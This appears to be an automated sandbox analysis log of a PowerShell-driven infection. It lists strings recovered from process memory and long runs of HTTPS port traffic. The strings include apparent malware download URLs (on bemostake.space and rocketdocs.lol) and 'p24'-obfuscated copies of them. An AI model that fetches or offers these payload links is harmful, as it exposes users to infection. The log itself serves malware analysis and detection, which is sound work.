Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC4A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1553322256.000001F3DC7C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1597108569.000001F3F4CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC614F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bemostake.space
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC614F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC614F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bp24mostakp24.spacp24/tp24st/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.p24xp24
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1664031768.000001BDD4C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1664031768.000001BDD4ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rocketdocs.lol
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rocketdocs.lol/utox_x86.exe
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rockp24tdocs.lol/utox_x86.p24xp24
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 56010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58337
Source: unknown	Network traffic detected: HTTP traffic on port 56973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58338
Source: unknown	Network traffic detected: HTTP traffic on port 55544 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57375
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58467
Source: unknown	Network traffic detected: HTTP traffic on port 58638 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56168
Source: unknown	Network traffic detected: HTTP traffic on port 58317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58466
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57373
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58221
Source: unknown	Network traffic detected: HTTP traffic on port 58936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58489 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57025
Source: unknown	Network traffic detected: HTTP traffic on port 55200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55464 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58595
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56296
Source: unknown	Network traffic detected: HTTP traffic on port 55361 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58358
Source: unknown	Network traffic detected: HTTP traffic on port 58444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57609 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58487
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58489
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56062
Source: unknown	Network traffic detected: HTTP traffic on port 55440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57395
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57154
Source: unknown	Network traffic detected: HTTP traffic on port 55360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58360
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 57461 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58466 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58014
Source: unknown	Network traffic detected: HTTP traffic on port 58639 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58131
Source: unknown	Network traffic detected: HTTP traffic on port 57588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56192
Source: unknown	Network traffic detected: HTTP traffic on port 56297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 55646 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57437 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56582 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58659
Source: unknown	Network traffic detected: HTTP traffic on port 56868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55388
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57566
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56478
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57567
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58423
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56480
Source: unknown	Network traffic detected: HTTP traffic on port 55465 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58661
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57330
Source: unknown	Network traffic detected: HTTP traffic on port 55752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56504 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55542 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58424
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57459
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56374
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58553
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58552
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56376
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57223
Source: unknown	Network traffic detected: HTTP traffic on port 57128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57461
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55284
Source: unknown	Network traffic detected: HTTP traffic on port 59140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55648 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57588
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58315
Source: unknown	Network traffic detected: HTTP traffic on port 57922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58317
Source: unknown	Network traffic detected: HTTP traffic on port 57394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58444
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58681
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56140
Source: unknown	Network traffic detected: HTTP traffic on port 57289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57351
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58682
Source: unknown	Network traffic detected: HTTP traffic on port 56296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57590
Source: unknown	Network traffic detected: HTTP traffic on port 56168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58487 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58446
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58575
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57481
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56272
Source: unknown	Network traffic detected: HTTP traffic on port 57024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58573
Source: unknown	Network traffic detected: HTTP traffic on port 55438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57480
Source: unknown	Network traffic detected: HTTP traffic on port 57785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55908
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58060
Source: unknown	Network traffic detected: HTTP traffic on port 57000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58199
Source: unknown	Network traffic detected: HTTP traffic on port 58767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58198
Source: unknown	Network traffic detected: HTTP traffic on port 56557 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55804
Source: unknown	Network traffic detected: HTTP traffic on port 58681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55802
Source: unknown	Network traffic detected: HTTP traffic on port 56192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59055
Source: unknown	Network traffic detected: HTTP traffic on port 55569 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58085
Source: unknown	Network traffic detected: HTTP traffic on port 58659 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55933
Source: unknown	Network traffic detected: HTTP traffic on port 57102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56453 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58509 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57523 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57052
Source: unknown	Network traffic detected: HTTP traffic on port 56114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58380
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58381
Source: unknown	Network traffic detected: HTTP traffic on port 56556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59004
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59125
Source: unknown	Network traffic detected: HTTP traffic on port 56324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58153
Source: unknown	Network traffic detected: HTTP traffic on port 57695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59123
Source: unknown	Network traffic detected: HTTP traffic on port 56920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58510 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57180
Source: unknown	Network traffic detected: HTTP traffic on port 57265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57567 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58039
Source: unknown	Network traffic detected: HTTP traffic on port 56452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57077
Source: unknown	Network traffic detected: HTTP traffic on port 57077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57545 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55568 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59021
Source: unknown	Network traffic detected: HTTP traffic on port 57590 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59023
Source: unknown	Network traffic detected: HTTP traffic on port 55908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59141
Source: unknown	Network traffic detected: HTTP traffic on port 59125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59140
Source: unknown	Network traffic detected: HTTP traffic on port 56220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57809
Source: unknown	Network traffic detected: HTTP traffic on port 57330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58381 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57922
Source: unknown	Network traffic detected: HTTP traffic on port 58403 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55620
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55621
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55985
Source: unknown	Network traffic detected: HTTP traffic on port 56062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55750
Source: unknown	Network traffic detected: HTTP traffic on port 58724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57547 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55517
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56608
Source: unknown	Network traffic detected: HTTP traffic on port 56634 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56609
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58902
Source: unknown	Network traffic detected: HTTP traffic on port 58290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58552 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55516
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55880
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55881
Source: unknown	Network traffic detected: HTTP traffic on port 57674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57502 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56738
Source: unknown	Network traffic detected: HTTP traffic on port 56532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58919
Source: unknown	Network traffic detected: HTTP traffic on port 58358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55646
Source: unknown	Network traffic detected: HTTP traffic on port 55802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55648
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56973
Source: unknown	Network traffic detected: HTTP traffic on port 58014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56740
Source: unknown	Network traffic detected: HTTP traffic on port 58152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57717
